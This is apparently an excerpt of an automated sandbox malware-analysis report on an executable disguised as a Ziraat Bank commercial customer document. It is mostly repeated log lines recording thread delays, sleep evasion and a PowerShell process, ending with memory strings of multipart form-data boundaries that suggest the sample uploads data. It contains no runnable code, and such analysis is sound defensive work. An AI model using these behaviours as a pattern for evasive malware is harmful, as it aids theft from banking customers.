          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598011Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597891Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597781Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597672Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597562Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597453Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597234Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597125Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597015Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596906Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596797Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596687Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596578Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596469Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595703Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595593Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595484Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595375Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595265Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595047Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594937Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594609Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5453Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4328Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeWindow / User API: threadDelayed 1295Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeWindow / User API: threadDelayed 8560Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 4020Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7324Thread sleep count: 1295 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7324Thread sleep count: 8560 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599218s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598671s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -598011s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597891s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597344s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597125s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -597015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -596031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595812s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595593s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595375s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595265s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -595047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -594937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -594828s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -594719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe TID: 7320Thread sleep time: -594609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 598011Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597891Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597781Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597672Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597562Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597453Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597344Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597234Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597125Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 597015Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596906Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596797Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596687Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596578Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596469Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596140Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595703Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595593Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595484Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595375Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595265Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 595047Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594937Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeThread delayed: delay time: 594609Jump to behavior
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2ebe433fc515<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfb3d74a07ef1
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce649becf6bdd
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0d5d287e471c<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2bc42932ad12<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd125ccd940545<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0c074be0e0b4<
